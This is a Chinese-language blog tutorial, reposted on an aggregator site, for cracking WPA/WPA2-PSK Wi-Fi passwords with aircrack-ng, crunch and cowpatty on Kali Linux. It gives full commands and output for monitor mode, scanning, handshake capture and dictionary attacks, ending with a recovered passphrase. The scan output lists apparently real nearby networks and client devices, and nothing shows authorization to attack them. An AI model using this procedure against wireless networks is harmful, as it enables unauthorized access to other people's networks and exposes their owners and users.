码迷,mamicode.com
首页 > 其他好文 > 详细

破解WPA/WPA2-PSK加密

时间:2015-09-23 01:25:07      阅读:351      评论:0      收藏:0      [点我收藏+]

标签:无线网卡   无线网络   虚拟机   linux   加密   

        下面以kali linux为例,带大家分别一起学习如何利用Aircrack 和 Cowpatty两种工具进行无线WPA/WPA-PSK的攻击与破解。如果大家是在vmware虚拟机上做破解攻击的话,你们需要先准备一个kali linux能够识别的外置无线网卡,然后再加载进虚拟的攻击机上,因为我是在自己本身的物理机上做的。

详细步骤如下:

        Step1:升级 Aircrack-ng

        为了更好地识别出无线网络设备以及环境,我们现在先对Airodump-ng的OUI库进行升级,想进入到Aircrack-ng的安装目录下,然后输入一下命令:airodump-ng-oui-update ,然后回车,等待一段时间之后就升级成功了。

        Step2:载入无线网卡

  •  在进入kali linux之后,进入图形界面之后,插入之前准备好的USB无线网卡,(我这里用的是MECURY 的300M无线网卡,大家可以上网找一下kali linux系统所支持的网卡芯片类型,只要能识别出就可以)再查看一下无线网卡的载入情况,可以使用一下命令查看:ifconfig -a

  • 如果载入识别成功之后,那么我们接下来便可以激活无线网卡了,输入下面命令便可激活:

    ifconfig wlan0 up

    其中,up用于启动网卡,这是我们可以再用ifconfg命令确认一下载入启用情况。


    Step3:激活网卡至monitor模式,就是我们平时所说的监听模式。

  • 这里要将网卡启动monitor模式,才能抓取无线数据包进行分析破解;我们可以利用aircrack-ng套件里面的airmon-ng工具开启监听模式:airmon-ng start wlan0 

  • root@kali:/opt/mydownload# airmon-ng start wlan0


    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID    Name
    2502    NetworkManager
    2531    wpa_supplicant


    Interface    Chipset        Driver

    wlan0        Atheros AR9565    ath9k - [phy0]
                    (monitor mode enabled on mon0)

    其中,上面的start后面是跟我们即将开启monitor模式的无线网卡设备名。

    而,上面的绿色的标记是无线网卡的芯片型号(Atheros AR9565),默认驱动为ath9k,在监听模式下,适配器更改名称为mon0。


        Step4:抓取目标信道的无线数据包

  • 开启好,监听模式之后,我们便使用Aircrack-ng套件里面的airodump-ng套件进行无线数据包的抓取,在这一步骤是整个破解过程比较重要的阶段;而其中我们要破解的关键点就是要获取AP与无线客户端的握手数据包(WPA/WPA2 shankhand)报文,然后对报文进行破解,从而提取出密钥,达到破解的木的。

    首先,我们在对目的AP的攻击之前,我们要先要对无线网络信道进行探测,以便于确定攻击的目标信道和AP,再进行下一步的针对性的数据包抓取。

    这是,我们可以使用下面的命令对信道数据进行侦查:airodump-ng wlan0

    airodump-ng 工具是用于获取当前无线网络的概况,包括AP的SSID、MAC地址、工作频道、无线客户端的MAC以及数量等情况,后面跟上的是无线网卡的设备名。


    BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
    B0:D5:9D:3B:B7:84, 2015-09-22 17:26:52, 2015-09-22 17:27:13, 11,  54, WPA2, CCMP,PSK, -91,        4,        0,   0.  0.  0.  0,  29, 瀵..8涓6锛.甯.姣..浠ヨ.,
    0C:84:DC:7B:BC:61, 2015-09-22 17:26:27, 2015-09-22 17:27:11,  1,  54, WPA2, CCMP,PSK, -86,       27,        0,   0.  0.  0.  0,   4, mini,
    00:87:36:0F:50:2F, 2015-09-22 17:26:27, 2015-09-22 17:27:07,  1,  54, WPA2, CCMP,PSK, -86,       10,        0,   0.  0.  0.  0,   3, kfc,
    60:36:DD:DD:D8:59, 2015-09-22 17:26:37, 2015-09-22 17:27:14, 11,  54, WPA2, CCMP,PSK, -85,       15,        0,   0.  0.  0.  0,   3, zwz,
    72:54:99:D1:73:D8, 2015-09-22 17:26:28, 2015-09-22 17:27:12,  2,  54, WPA2, CCMP,PSK, -83,       46,        0,   0.  0.  0.  0,  15, DreamBox_D173D8,
    00:1F:64:E0:20:E9, 2015-09-22 17:26:27, 2015-09-22 17:27:13,  3,  54, OPN ,       ,   , -77,       58,        0,   0.  0.  0.  0,   8, CMCC-WEB,
    00:1F:64:E1:20:E9, 2015-09-22 17:26:27, 2015-09-22 17:27:13,  3,  54, WPA2, CCMP, MGT, -77,       62,        0,   0.  0.  0.  0,   4, CMCC,
    D4:EE:07:20:0A:5A, 2015-09-22 17:26:27, 2015-09-22 17:27:11,  1,  54, WPA2, CCMP,PSK, -76,       49,        0,   0.  0.  0.  0,   6, WXWiFi,
    3A:67:B0:71:FD:1D, 2015-09-22 17:26:30, 2015-09-22 17:27:14, 11,  54, WPA2, CCMP,PSK, -75,       82,        0,   0.  0.  0.  0,  13, LieBaoWiFi819,
    2C:D0:5A:FB:B5:28, 2015-09-22 17:26:29, 2015-09-22 17:27:14, 10,  54, WPA2, CCMP,PSK, -69,       65,       37,   0.  0.  0.  0,  24, ...澶х.峰氨缁.浣.,
    48:5A:B6:D9:1F:11, 2015-09-22 17:26:29, 2015-09-22 17:27:14, 11,  54, WPA2, CCMP,PSK, -65,       88,        0,   0.  0.  0.  0,  12, 360WiFi-8317,
    00:36:76:36:EF:A7, 2015-09-22 17:26:27, 2015-09-22 17:27:13,  6,  54, WPA2, CCMP,PSK, -61,       95,        0,   0.  0.  0.  0,  13, 缁...~..韬,
    D2:7E:35:A3:87:2A, 2015-09-22 17:26:30, 2015-09-22 17:27:14, 11,  54, WPA2, CCMP,PSK, -50,       31,        0,   0.  0.  0.  0,   3, gun,

    Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
    D4:0B:1A:69:34:00, 2015-09-22 17:26:40, 2015-09-22 17:26:40, -90,        8, (not associated) ,
    9C:65:B0:0F:9D:3A, 2015-09-22 17:27:01, 2015-09-22 17:27:01, -88,        4, (not associated) ,
    60:36:DD:DD:D8:59, 2015-09-22 17:26:52, 2015-09-22 17:26:53, -87,        3, (not associated) ,
    48:D2:24:1C:A1:B5, 2015-09-22 17:26:36, 2015-09-22 17:26:36, -85,        1, (not associated) ,
    70:72:3C:ED:DE:1D, 2015-09-22 17:26:38, 2015-09-22 17:26:45, -84,        4, 0C:84:DC:7B:BC:61, mini
    90:E7:C4:83:7E:66, 2015-09-22 17:26:37, 2015-09-22 17:27:08, -81,        6, 00:87:36:0F:50:2F,
    38:BC:1A:21:D0:5B, 2015-09-22 17:26:30, 2015-09-22 17:27:01, -74,       18, 3A:67:B0:71:FD:1D,
    BC:85:56:DD:84:54, 2015-09-22 17:27:02, 2015-09-22 17:27:02, -74,        9, (not associated) ,
    48:5A:B6:D9:1F:11, 2015-09-22 17:26:55, 2015-09-22 17:27:03, -67,       13, 3A:67:B0:71:FD:1D,
    60:D9:A0:A9:51:9C, 2015-09-22 17:26:34, 2015-09-22 17:26:48, -58,       23, 2C:D0:5A:FB:B5:28,
    30:C7:AE:A5:F5:02, 2015-09-22 17:26:40, 2015-09-22 17:27:09, -51,       11, 2C:D0:5A:FB:B5:28,

    上面是抓去无线环境的一个csv输出报文,可以从上面的信息中,清晰看到BSSID、信道、信道速率、认证方式、ESSID,还有红色部分的分别有station(无线客户端)MAC,packets的个数,BSSID(连接AP的MAC地址),ESSID等信息。

  • 通过上面对无线网络环境的初步探测之后,我们便对其中的目标信道里面的特定AP进行数据包报文的探测分析,如11信道的ESSID为“gun”的AP进行分析。

    kaili#airodump-ng -c 11 -w test2 mon0

    -c:针对信道号

    -w:输出的cap和csv报文名称

    mon0:无线适配器的别名

    Step5:

  • kali#aircrack-ng -w /usr/share/metasploit-framework/data/john/wordlists/password.lst test2-01.cap
    其中,-w:指定破解的字典文件,test2-01.cap是抓取的无线数据包报文。

       #  BSSID              ESSID                     Encryption

       1  D2:7E:35:A3:87:2A  gun                       WPA (1 handshake)   

    //表明其中有WPA的握手数据包,可以进行破解
       2  48:5A:B6:D9:1F:11  360WiFi-8317              WPA (0 handshake)
       3  BC:85:56:DD:84:54  APC201504300012           WPA (0 handshake)
       4  2C:D0:5A:FB:B5:28  ????????????澶х??????氨缁??????????????????  WPA (0 handshake)
       5  00:36:76:36:EF:A7  缁????????????~????????????????            WPA (0 handshake)
       6  D4:EE:07:20:0A:5A  WXWiFi                    WPA (0 handshake)
       7  0C:84:DC:7B:BC:61  mini                      WPA (0 handshake)
       8  72:54:99:D1:73:D8  DreamBox_D173D8           WPA (0 handshake)
       9  00:1F:64:E0:20:E9  CMCC-WEB                  None (10.167.160.1)
      10  00:1F:64:E1:20:E9  CMCC                      No data - WEP or WPA
      11  00:87:36:0F:50:2F  kfc                       WPA (0 handshake)
      12  46:FD:52:FF:15:88  12345                     No data - WEP or WPA
      13  60:36:DD:DD:D8:59  zwz                       No data - WEP or WPA
      14  F8:2F:A8:B3:84:7D  luo                       WPA (0 handshake)
      15  BC:85:56:36:A1:C4  5B204                     No data - WEP or WPA
      16  66:14:4B:5F:24:E8                            Unknown
      17  68:94:23:F1:04:73  forgivinglove             WPA (0 handshake)
      18  66:6D:57:39:AA:2C                            WPA (0 handshake)
      19  00:00:00:00:00:00                            WPA (0 handshake)
      20  26:DB:30:9C:20:23  Mandy                     No data - WEP or WPA
      21  06:5E:38:95:D3:4B                            WPA (0 handshake)
      22  1C:66:AA:FC:B9:FD  ??????跨????????????                 No data - WEP or WPA
    "wlan crack" 165L, 5687C                                                                                                                              1,1          顶端

    Index number of target network ? 1
    //选择目标网络1
    Opening test2-01.cap
    Reading packets, please wait...

                                     Aircrack-ng 1.2 beta3


                       [00:01:38] 50667 keys tested (539.03 k/s)


                           Current passphrase: zubeneschamali


          Master Key     : FD 12 2C 9B 67 3C 37 08 B9 79 D3 9E 13 16 E7 BB
                           B3 E0 F0 66 C9 4A DA C9 C1 D3 19 C2 1E 59 5B A4

          Transient Key  : FC D7 CC B3 4C 8A E4 F3 EC 1B 84 91 C8 47 88 48
                           72 CE 62 1A C8 B7 C3 32 E2 86 AB 13 FC CA 12 CE
                           C0 62 A4 19 C2 E9 99 49 B5 DE 4B 90 83 CB E6 BE
                           D9 9B 97 68 57 CD BD 53 81 11 8B 2E CF 34 54 99

          EAPOL HMAC     : 66 55 4C 70 E9 E0 55 BE D7 83 72 64 7F 1C CB 75

    Passphrase not in dictionary

    //说明当前字典找不到对于的字段匹配到密钥,所以我们可以自己制作一个字典针对破解

  • root@kali:~/Desktop#crunch 8 8 charset.lst numberic -o test.dic

    //制作一个单纯8位数字的字典文件test.dic
    Crunch will now generate the following amount of data: 387420489 bytes
    369 MB
    0 GB
    0 TB
    0 PB
    Crunch will now generate the following number of lines: 43046721

    crunch:  34% completed generating output

    crunch:  67% completed generating output

    crunch:  99% completed generating output

    crunch: 100% completed generating output
    root@kali:~/Desktop# cowpatty -f test.dic -r test2-01.cap


    mentohust_0.3.4-1_i386.deb  test2-01.cap                test2-01.kismet.csv         test.dic
    mentohust_0.3.4-1_i386.zip  test2-01.csv                test2-01.kismet.netxml      教程重要说明.txt
    root@kali:~/Desktop# cowpatty -f test.dic -r test2-01.cap
    mentohust_0.3.4-1_i386.deb  test2-01.cap                test2-01.kismet.csv         test.dic
    mentohust_0.3.4-1_i386.zip  test2-01.csv                test2-01.kismet.netxml      教程重要说明.txt



    root@kali:~/Desktop# cowpatty -f test.dic -r test2-01.cap -s gun
    //使用cowpatty破解加密密钥  -f:破解词典文件 ;   -r:无线数据包报文;  -s:SSID名称

                                                                                                                                                          61,0-1        44%


    cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>

    Collected all necessary data to mount crack against WPA2/PSK passphrase.
    Starting dictionary attack.  Please be patient.
    key no. 1000: cccchrrc
    key no. 2000: ccccatth
    key no. 3000: ccccshca
    key no. 4000: ccccesrr
    key no. 5000: cccct.ts
    key no. 6000: cccclace
    key no. 7000: ccchcert
    key no. 8000: ccchhlt.
    key no. 9000: ccchrrcl
    key no. 10000: ccchstsc
    key no. 11000: ccchtc.h
    key no. 12000: ccch.sha
    key no. 13000: ccchl.sr
    key no. 14000: cccahh.s
    key no. 15000: cccaaehe
    key no. 16000: cccarlst
    key no. 17000: cccaea..
    key no. 18000: cccatthl
    key no. 19000: cccalcec
    key no. 20000: cccrcrlh
    key no. 21000: cccrh.aa
    key no. 22000: cccrrher
    key no. 23000: cccrssls
    key no. 24000: cccrelae
                                                                                                                                                          118,1         65%


    ^[OH^[OHkey no. 35000: cccercc.
    key no. 36000: cccesrrl
    key no. 37000: ccceet.c
    key no. 38000: ccce.hhh
    key no. 39000: cccelssa
    key no. 40000: ccctc..r
    key no. 41000: ccctaahs
    key no. 42000: ccctrese
    key no. 43000: ccctsl.t
    key no. 44000: cccttrh.
    key no. 45000: ccct.tsl
    key no. 46000: ccc.cclc
    //因为破解的难度是随着密钥的设置的密码强度而递增的,所以,成功率也取决与密码的复杂程度,破解也需耗费比较长的时间,需要更多的耐心


    下面是用aircrack-ng破解:

  • aircrack-ng -w  test2.dic  test2-01.cap


                                     Aircrack-ng 1.2 beta3


                       [03:42:41] 7192600 keys tested (639.81 k/s)


                               KEY FOUND! [ 44448888 ]   //经过3:42:41的时间后,终于破解到KEY的ASSCII值为44448888


          Master Key     : 2C 1D BA 6C 8C A0 12 E0 3B 05 46 C9 59 3E 91 CD
                           84 DB BC F8 DC EA 1A 8A 2A FB 74 87 2B 20 6C BF

          Transient Key  : D0 B3 CA 56 6B EA C9 13 69 05 6B FE 7A E4 04 9E
                                      95 16 6A FC E9 4B B6 A2 1C 38 68 77 78 A6 4F 4E
                                       9F B2 F7 8B 86 3F 73 33 AB 4D FA BB 08 2B F8 06
                                       BF 8A B8 BE 66 E5 A2 44 63 41 31 C6 0E 7B 6D 75

          EAPOL HMAC     : A0 C9 20 87 8E EF D0 34 37 1F 62 DB 0A 57 9C D8



以上便是利用aircrack-ng套件破解WPA/WPA2-PSK无线加密的破解过程,如有疑问请与本人交流,谢谢。

本文出自 “vencent” 博客,请务必保留此出处http://vencent.blog.51cto.com/9848811/1697242

破解WPA/WPA2-PSK加密

标签:无线网卡   无线网络   虚拟机   linux   加密   

原文地址:http://vencent.blog.51cto.com/9848811/1697242

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!